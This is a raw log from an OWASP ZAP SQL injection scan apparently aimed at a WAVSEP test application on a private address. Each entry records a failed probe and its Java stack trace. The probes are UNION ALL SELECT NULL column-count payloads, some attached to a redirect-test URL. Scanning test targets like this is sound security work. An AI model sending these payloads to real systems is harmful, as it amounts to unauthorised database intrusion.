[http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681434 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681435 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681435 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681436 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681436 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681437 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681438 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681439 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681439 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681440 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681441 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681442 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 